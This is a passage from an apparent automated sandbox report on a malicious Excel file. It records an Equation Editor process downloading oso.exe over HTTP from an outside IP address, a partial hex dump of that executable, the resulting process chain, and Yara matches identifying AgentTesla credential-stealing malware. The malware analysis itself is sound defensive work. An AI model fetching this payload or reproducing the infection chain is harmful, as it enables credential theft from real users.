                        Jul 22, 2021 18:18:33.882860899 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.882891893 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.895407915 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:33.979285002 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.979331017 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:33.983858109 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038085938 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038132906 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038161993 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038184881 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038188934 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038208961 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038213015 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038218975 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038233042 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038247108 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038255930 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038276911 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038290977 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038305998 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038317919 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038336992 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038347006 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038367987 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038387060 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038394928 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038404942 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038423061 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038434029 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038464069 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038513899 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038546085 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038557053 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038574934 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038589954 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038604975 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038621902 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038634062 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038652897 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038670063 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038677931 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038722038 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038732052 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038752079 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038760900 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038781881 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038790941 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038813114 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038825035 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038842916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038852930 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038871050 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038882971 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038901091 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038909912 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038932085 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038944006 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038950920 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:34.038970947 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.038990974 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.041630983 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:34.932570934 CEST4916780192.168.2.22198.12.91.148

                        HTTP Request Dependency Graph

                        • 198.12.91.148

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.2249167198.12.91.14880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampkBytes transferredDirectionData
                        Jul 22, 2021 18:18:32.238163948 CEST0OUTGET /oso.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.12.91.148
                        Connection: Keep-Alive
                        Jul 22, 2021 18:18:32.379816055 CEST1INHTTP/1.1 200 OK
                        Date: Thu, 22 Jul 2021 16:18:32 GMT
                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                        Last-Modified: Thu, 22 Jul 2021 07:24:36 GMT
                        ETag: "f9800-5c7b12de621e5"
                        Accept-Ranges: bytes
                        Content-Length: 1021952
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 1d f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 32 0c 00 00 62 03 00 00 00 00 00 2e 51 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 10 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 50 0c 00 4b 00 00 00 00 80 0c 00 e8 5d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 31 0c 00 00 20 00 00 00 32 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 60 0c 00 00 02 00 00 00 36 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5d 03 00 00 80 0c 00 00 5e 03 00 00 38 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0f 00 00 02 00 00 00 96 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+`2b.Q `@ @PK] H.text41 2 `.sdata`6@.rsrc]^8@@.reloc@B
                        Jul 22, 2021 18:18:32.379856110 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 51 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 65 01 00 84 21 01 00 03 00 00 00 01 00 00 06 28 87 02 00 a9 c9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: QHe!(0&+&(((o*0+&+& 8*(((8* E
                        Jul 22, 2021 18:18:32.379901886 CEST4INData Raw: 04 02 7b 07 00 00 04 38 00 00 00 00 2a 00 00 86 2b 02 26 16 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 38 00 00 00 00 2a 00 00 86 2b 02 26 16 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 38 00 00
                        Data Ascii: {8*+&{(+}{8*+&{(+}{8*+&{(+}{8*+&{(+}{8*+&{(+}{8*+&{(+}{8*+&{
                        Jul 22, 2021 18:18:32.379926920 CEST5INData Raw: ff ff 26 20 04 00 00 00 16 39 d2 ff ff ff 26 2a 00 13 30 03 00 a7 00 00 00 01 00 00 11 2b 02 26 16 17 28 2a 00 00 06 3a 1e 00 00 00 26 20 02 00 00 00 38 3e 00 00 00 03 02 7b 0d 00 00 04 fe 01 39 15 00 00 00 38 0b 00 00 00 26 20 04 00 00 00 38 20
                        Data Ascii: & 9&*0+&(*:& 8>{98& 8 8i9J8: E1 ():&rqps4z|(+ 8*0+& ():!&89x
                        Jul 22, 2021 18:18:32.515589952 CEST7INData Raw: 00 00 38 a1 ff ff ff 38 00 00 00 00 06 2a 00 13 30 02 00 12 00 00 00 0e 00 00 11 2b 02 26 16 00 7e 13 00 00 04 0a 38 00 00 00 00 06 2a 00 00 32 2b 02 26 16 00 02 80 13 00 00 04 2a 00 00 00 13 30 04 00 21 00 00 00 0a 00 00 11 2b 02 26 16 00 28 44
                        Data Ascii: 88*0+&~8*2+&*0!+&(DrAp~(V8*0!+&(DrGp~o;8*0!+&(DrMp~(V8*0!+&(DrUp~o;
                        Jul 22, 2021 18:18:32.517291069 CEST8INData Raw: 00 00 6f 43 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 44 00 00 0a 2a 00 13 30 02 00 12 00 00 00 12 00 00 11 2b 02 26 16 00 28 5a 00 00 06 0a 38 00 00 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 13 30 04 00 af
                        Data Ascii: oC*J+&oD*0+&(Z8*+&*+&*0+&((:&& 8c{~E(8*& (:8&8^{ 9&9({8 E
                        Jul 22, 2021 18:18:32.517352104 CEST10INData Raw: 00 00 00 06 2a 00 00 76 2b 02 26 16 2b 02 26 16 00 02 28 30 00 00 0a 00 02 28 7b 00 00 06 28 64 00 00 06 00 2a 00 00 1b 30 04 00 4c 02 00 00 1a 00 00 11 2b 02 26 16 00 73 4d 00 00 0a 0b 07 28 7b 00 00 06 72 4f 02 00 70 28 4b 00 00 0a 28 4c 00 00
                        Data Ascii: *v+&+&(0({(d*0L+&sM({rOp(K(LoNrspoOsPoQ8oRt>s|rpoSoToU(VohrpoSoT(Vojoi(oolrpoS
                        Jul 22, 2021 18:18:32.520554066 CEST11INData Raw: 04 39 09 00 00 00 07 18 6f 61 00 00 0a 00 00 00 05 13 05 11 05 39 09 00 00 00 07 19 6f 61 00 00 0a 00 00 00 0e 04 13 06 11 06 39 09 00 00 00 07 1a 6f 61 00 00 0a 00 00 00 0e 05 13 07 11 07 39 09 00 00 00 07 1b 6f 61 00 00 0a 00 00 00 0e 06 13 08
                        Data Ascii: 9oa9oa9oa9oa9oa8*0+&9~E8sboc8&(d(ermp(Kof&(g:o\
                        Jul 22, 2021 18:18:32.522749901 CEST13INData Raw: 00 00 00 26 38 6c 00 00 00 12 05 28 6f 00 00 0a 13 06 09 11 06 6f de 00 00 06 6f 55 00 00 0a 72 6d 03 00 70 28 4b 00 00 0a 6f 66 00 00 0a 26 38 26 00 00 00 20 03 00 00 00 fe 0e 08 00 fe 0c 08 00 45 05 00 00 00 aa ff ff ff 00 00 00 00 1a 00 00 00
                        Data Ascii: &8l(oooUrmp(Kof&8& E.8& (:8(p 8:zo\ohoi( :%&~E8sb8. E
                        Jul 22, 2021 18:18:32.522883892 CEST14INData Raw: 00 13 00 00 00 0a 00 00 11 2b 02 26 16 00 02 7b 28 00 00 04 0a 38 00 00 00 00 06 2a 00 36 2b 02 26 16 00 02 03 7d 28 00 00 04 2a 00 00 13 30 02 00 13 00 00 00 0a 00 00 11 2b 02 26 16 00 02 7b 29 00 00 04 0a 38 00 00 00 00 06 2a 00 36 2b 02 26 16
                        Data Ascii: +&{(8*6+&}(*0+&{)8*6+&})*0+&{*8*6+&}**0'+&{*rqpryp(o38*0+&{+8*6+&}+*0
                        Jul 22, 2021 18:18:32.522968054 CEST15INData Raw: 05 75 42 00 00 01 6f 5c 00 00 0a 00 dc 09 0a 20 05 00 00 00 38 74 fd ff ff 38 00 00 00 00 06 2a 00 00 00 41 1c 00 00 02 00 00 00 97 00 00 00 39 02 00 00 d0 02 00 00 1a 00 00 00 00 00 00 00 1b 30 04 00 04 02 00 00 29 00 00 11 2b 02 26 16 00 73 4d
                        Data Ascii: uBo\ 8t8*A90)+&sM(rp(K(LoNrpoOsxoQ8oRt>srpoSoToU(Vor%poSoToU(WorA


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:18:17:44
                        Start date:22/07/2021
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f910000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:18:06
                        Start date:22/07/2021
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                        Imagebase:0x400000
                        File size:543304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:18:10
                        Start date:22/07/2021
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\Public\vbc.exe'
                        Imagebase:0xec0000
                        File size:1021952 bytes
                        MD5 hash:E8194372570D57749B3033E063BDC5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        General

                        Start time:18:18:33
                        Start date:22/07/2021
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\Public\vbc.exe
                        Imagebase:0xec0000
                        File size:1021952 bytes
                        MD5 hash:E8194372570D57749B3033E063BDC5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >

                          Executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: 48 m
                          • API String ID: 0-3539090821
                          • Opcode ID: e62e08d7a9ee75df8f9c9964a82f3530bd65f5100232eeb1ea42b546a4f9e814
                          • Instruction ID: c847d5de71181ac9617d3be153fc68402d2da1a80286d9bdf8317be98349ae89
                          • Opcode Fuzzy Hash: e62e08d7a9ee75df8f9c9964a82f3530bd65f5100232eeb1ea42b546a4f9e814
                          • Instruction Fuzzy Hash: FAF12530A093958FD706CB78E8516AABFF5EF42304F1684AAD445DB3A2D734DC45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ;Z
                          • API String ID: 0-1396556622
                          • Opcode ID: d593001af368abe492c5cfde407ee1241cd6f0847351e5ef66e8e7d79e829295
                          • Instruction ID: 228bdeeacb2d9cd667f260a0ed77b344c677a1f7dcedb6eeac7ab35d64cc748a
                          • Opcode Fuzzy Hash: d593001af368abe492c5cfde407ee1241cd6f0847351e5ef66e8e7d79e829295
                          • Instruction Fuzzy Hash: B75214307083805FD713E774E814B6A3BA69F82304F1684AAD545DF7A6EB75DC0ACB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: 48 m
                          • API String ID: 0-3539090821
                          • Opcode ID: 105b1255b449af7ad40d49fdea3c266091027d6347bb41f7663cb0bb3cdab5c4
                          • Instruction ID: d61711e8129a55acc4f029b417baa89da8b5a81c1d0be9334792781f3534e373
                          • Opcode Fuzzy Hash: 105b1255b449af7ad40d49fdea3c266091027d6347bb41f7663cb0bb3cdab5c4
                          • Instruction Fuzzy Hash: BB913630B093514FDB139B78E852BAA3BB1AF83314F1685B6D445DB2A6D738DC05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: JNj
                          • API String ID: 0-2513429421
                          • Opcode ID: adaeaffeb38285c148bc2485d38e6ed968b04556508874c23ca9d0fa1a76f963
                          • Instruction ID: a5b4421092a7a4d7366c4fc3d84dc826b6e0a6e4a18beaae280f67957e26e065
                          • Opcode Fuzzy Hash: adaeaffeb38285c148bc2485d38e6ed968b04556508874c23ca9d0fa1a76f963
                          • Instruction Fuzzy Hash: 64B18D70E04229CFDF11CFA8D88679DBBF2BF88314F258529D814E7294DB759845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ,GNj$JNj
                          • API String ID: 0-3554904898
                          • Opcode ID: e8bb99e5343d6ec712e0f60b87e39287a09d5b24fc5ae76fe180a921e4862b18
                          • Instruction ID: 6d4c65f19ce56b557853361d483fbd379d150103e1c95fb54af5d308956a560e
                          • Opcode Fuzzy Hash: e8bb99e5343d6ec712e0f60b87e39287a09d5b24fc5ae76fe180a921e4862b18
                          • Instruction Fuzzy Hash: 9481A170E006198FDF15CFA9E8857EDBBF2BF88318F258529D805E7290DB749985CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ,GNj$,GNj
                          • API String ID: 0-1948410943
                          • Opcode ID: fc505c464c5bff4bf343ac089e340ea8a73fa6b2fc2fadb8471979667f0dca9f
                          • Instruction ID: eab571d67761ab46470977a179f85b2a79a611315cc15c951e9a0a839f65de8b
                          • Opcode Fuzzy Hash: fc505c464c5bff4bf343ac089e340ea8a73fa6b2fc2fadb8471979667f0dca9f
                          • Instruction Fuzzy Hash: 5F717770E006299FDB11CFA8D885BEEBBF2BF88314F158529E414A7250EB749A41CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ,GNj$,GNj
                          • API String ID: 0-1948410943
                          • Opcode ID: e76ac7e0a196ae3e7e2a030abdb0c8814aa6d4a68566d1e111e22789ed2f5db9
                          • Instruction ID: f4bafdfb2ff8cce85bab85aeec35b348c65484f560bf1477ad365426fff6047d
                          • Opcode Fuzzy Hash: e76ac7e0a196ae3e7e2a030abdb0c8814aa6d4a68566d1e111e22789ed2f5db9
                          • Instruction Fuzzy Hash: 08717970E006289FDF15CFA8D8857EEBBF2BF88314F158529E415A7250EB749A41CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ;Z
                          • API String ID: 0-1396556622
                          • Opcode ID: 7ce0b2fcbff7aa5b8b19e577a3f1fcc27601467fcbadc0eb1faad073b4dac1ee
                          • Instruction ID: 20fdb7902a3e65a139c0781c3d4737914ffbc0131bd299dad5bdabf7e61e66a6
                          • Opcode Fuzzy Hash: 7ce0b2fcbff7aa5b8b19e577a3f1fcc27601467fcbadc0eb1faad073b4dac1ee
                          • Instruction Fuzzy Hash: EB023830B042108BDB16FB74E854BAE77E3AF85308F15482DC4469BB95DF759C45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: KDBM
                          • API String ID: 0-3504354710
                          • Opcode ID: 6a4961c7e3fc9ead21eea4ff7eaed60307199ddc9d2d7c7de0455e0ecb6826cd
                          • Instruction ID: 01018aa0694ba5f2b5889515963aebc65f689fac53916c8bfcfc7a391502bedf
                          • Opcode Fuzzy Hash: 6a4961c7e3fc9ead21eea4ff7eaed60307199ddc9d2d7c7de0455e0ecb6826cd
                          • Instruction Fuzzy Hash: A0B1C7745083868FD702EBB4FC68BC97F75AF46304F058592D081DB57ADBB4098ACB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: KDBM
                          • API String ID: 0-3504354710
                          • Opcode ID: 7c53fee8777e2f4da3c9be6afd01461bee38f1b9614fd95e957bc25362e74ecd
                          • Instruction ID: 6dfdc12341f142c79cf5d795db3369adc8532b2f33f2f2c12171e988e3cc472b
                          • Opcode Fuzzy Hash: 7c53fee8777e2f4da3c9be6afd01461bee38f1b9614fd95e957bc25362e74ecd
                          • Instruction Fuzzy Hash: B1814CB4A1024A8FDB45EFF4F958B8D3FB6EB84308F008924D1859B678DBB1159ACF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: -1
                          • API String ID: 0-808273962
                          • Opcode ID: 5dac3c1bcc1c001ee33d278f4cbae27584a820e7babc9576d14e21446e1e2bab
                          • Instruction ID: 7d86ba9ffdeda874f434744969fc01328c513eb7c0ca0dacf5919ec663841b6e
                          • Opcode Fuzzy Hash: 5dac3c1bcc1c001ee33d278f4cbae27584a820e7babc9576d14e21446e1e2bab
                          • Instruction Fuzzy Hash: 7A51BF3070D3845FD3039738A925A663FBA8B97304F1A84E7D144CF2A7EA64DC0AC762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5dcc851d10d84145173f1795951cb4ed3d2d32e4dbd26bba05a0d024fcdf215
                          • Instruction ID: 2ad43e496a17ef5a4c1c5101f5a3d5363d18332af9d0ccce77f15fd0ccccfbd8
                          • Opcode Fuzzy Hash: c5dcc851d10d84145173f1795951cb4ed3d2d32e4dbd26bba05a0d024fcdf215
                          • Instruction Fuzzy Hash: 9C912830B006508BDB26BB38E85876E77E39FC1304F15882DC4969BB94DF719C49CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aedd47b61e05b4529a95c76b622cfe51ee3f468eb5ebb4769813280c0a4f6642
                          • Instruction ID: 6b5b56eec19972ee178fddcd45ad5d1dcf8222d5e9b309088b8a4ad99cbe3522
                          • Opcode Fuzzy Hash: aedd47b61e05b4529a95c76b622cfe51ee3f468eb5ebb4769813280c0a4f6642
                          • Instruction Fuzzy Hash: 75912730B006508BDB26BB78E85876E77E39FC1304F55882EC0969BB94CF719C49CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 81cfa2011b724918d585135856c0a85a09a23f9a77b91c5cd1334eb0ef8c05fc
                          • Instruction ID: 609185941865a3c31082ce47ea89092518225184f21f229d3cf692d4b0c7d36f
                          • Opcode Fuzzy Hash: 81cfa2011b724918d585135856c0a85a09a23f9a77b91c5cd1334eb0ef8c05fc
                          • Instruction Fuzzy Hash: E351ABB0E003289FDF11CFA8D8857DEBBF2BF48714F158429E819AB250D7789A45CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e07e13953d8dc551bb6d59bfe42a94b871b0bcb3609006fcb579b6fc08052ce8
